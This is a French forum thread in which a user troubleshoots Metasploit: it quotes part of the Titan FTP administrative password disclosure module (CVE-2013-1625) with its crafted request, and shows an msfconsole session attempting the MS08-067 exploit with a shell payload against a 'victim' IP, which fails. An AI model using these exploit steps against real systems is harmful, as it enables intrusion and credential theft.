Metasploit, un peu d'aide ne me ferais pas de mal !!
316079
Messages postés
16
Date d'inscription
Statut
Membre
Dernière intervention
-
316079 Messages postés 16 Date d'inscription Statut Membre Dernière intervention -
316079 Messages postés 16 Date d'inscription Statut Membre Dernière intervention -
Bonjour,
je suis sous linux. J'ai installé Metasploit, afin de tester les différentes machines sur le réseau. (le réseau et les machines étant les miennes bien sur) Mais déjà au lancement de metasploit, il m'indique quelque chose d'étrange : une erreur de syntaxe dans le programme (du moins, je crois):
[-] WARNING! The following modules could not be loaded!
[-] /home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb: SyntaxError compile error
/home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb:40: syntax error, unexpected ')'
D'ou est-ce que cela provient ?
Merci d'avance
P.S : J'ai été vérifier au chemin indiqué, mais je ne trouve pas de parenthèse manquante.
je suis sous linux. J'ai installé Metasploit, afin de tester les différentes machines sur le réseau. (le réseau et les machines étant les miennes bien sur) Mais déjà au lancement de metasploit, il m'indique quelque chose d'étrange : une erreur de syntaxe dans le programme (du moins, je crois):
[-] WARNING! The following modules could not be loaded!
[-] /home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb: SyntaxError compile error
/home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb:40: syntax error, unexpected ')'
D'ou est-ce que cela provient ?
Merci d'avance
P.S : J'ai été vérifier au chemin indiqué, mais je ne trouve pas de parenthèse manquante.
A voir également:
- Metasploit, un peu d'aide ne me ferais pas de mal !!
- Metasploit pro - Télécharger - Divers Utilitaires
- Pourquoi la tnt fonctionne mal en ce moment - Guide
- Ticket restaurant mal déchiré ✓ - Forum Loisirs / Divertissements
- Clic souris fonctionne mal - Forum souris / Touchpad
- Mon telephone capte mal le reseau - Guide
4 réponses
Salut,
Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
Merci pour ta réponse,
Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))
Extrait du code :
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',
'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)
register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end
def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res
if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end
xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root
srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]
Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.
Merci beaucoup d'avance ! :)
P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!
Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))
Extrait du code :
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',
'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)
register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end
def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res
if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end
xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root
srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]
Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.
Merci beaucoup d'avance ! :)
P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!